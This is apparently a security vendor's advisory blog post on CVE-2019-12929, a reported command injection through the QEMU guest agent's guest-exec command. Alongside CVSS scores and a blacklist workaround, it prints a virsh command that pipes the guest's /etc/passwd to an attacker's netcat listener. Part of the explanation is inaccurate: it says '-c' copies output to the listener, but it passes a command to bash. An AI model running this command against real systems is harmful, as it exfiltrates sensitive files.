A critical vulnerability has been discovered recently in QEMU (Quick Emulator). Beware of the Command execution vulnerability that exists in QEMU, a hosted virtual machine monitor.

It was recently discovered that the QEMU Guest agent’s command ‘guest_exec‘ has encountered a critical OS command injection vulnerability which allows any remote unauthenticated attacker to gain sensitive information, execute command or conduct denial-of-service. CVE-2019-12929 is the CVE assigned to this vulnerability. This vulnerability can be exploited by sending a crafted QMP command (guest_exec) with malicious input to the targeted system. The vulnerability exists due to the improper handling of the QMP command by the affected software.

This vulnerability is considered critical since the attacker can compromise the confidentiality and integrity of the system. The access complexity for successful exploitation of this vulnerability is also very low which is the major advantage to the attacker.


Exploitation:
Recently, the steps for exploitation were outlined by a security researcher Fakhri ZulkifliĀ  in order to exploit this vulnerability. This exploitation can be achieved by acquiring some minimum knowledge about QEMU host and guest services, but it would be difficult to exploit in a restricted environment (with no network access to untrusted sources).

  • Qemu guest agent service must be running.
  • Set up any port listener.
  • In the qemu-host, run the following command:

virsh qemu-agent-command <domain name of guest> '{"execute":"guest-exec","arguments":{"path":"/bin/bash","arg": ["-c", "cat /etc/passwd | nc <attacker ip> <listening port number>"]}}'

qemu-agent-command is the command where we run the guest-exec API in the guest OS. In the above code, we give guest-exec as the parameter to qemu-agent-command which will run the ‘cat /etc/passwd‘ command. Argument ‘-c‘ is used to copy the output of the executed command to the listening server port.

After the command has run successfully, the attacker is able to get the contents of /etc/passwd file without any access to the guest OS.

Although QEMU has not confirmed this vulnerability, we were able to successfully exploit it on Ubuntu environment confirming the existence of this vulnerability in QEMU. According to the researcher, this vulnerability can be reproduced on Windows and MacOS as well.

An attacker sends qemu-exec command to the guest OS (ubuntu16.04) to retrieve the content of file /etc/passwd. The file content of /etc/passwd from the guest OS will be delivered to the attacker via port 1234 as shown in the below animation.


CVSS v3.0 Severity and Metrics:
Base Score: 9.8 CRITICAL
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVSS v2.0 Severity and Metrics:
Base Score: 10.0 HIGH
Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C


Affected software:
QEMU version 4.0.0 and earlier


Workaround:
Patch has not yet been released by the vendor for this vulnerability. Meanwhile, users can follow the workaround to safeguard their system from attackers.

  • Users can disable guest-exec command in the guest OS by using qemu-ga blacklist command which adds the particular API to the blacklist.

qemu-ga --blacklist=guest-exec

Safeguards:

  • Administrators are expected to keep the QEMU application up-to-date by installing all the updates.
  • Network access should should be given only to trusted users.
  • Administrators can use firewalls and antivirus applications to protect their systems from being subjected to this attack.
Summary
Caution QEMU Users!!! Your password file may be open to attackers
Article Name
Caution QEMU Users!!! Your password file may be open to attackers
Author
Publisher Name
SecPod Technologies
Publisher Logo

Leave a Reply

Your email address will not be published. Required fields are marked *

You may use these HTML tags and attributes:

<a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>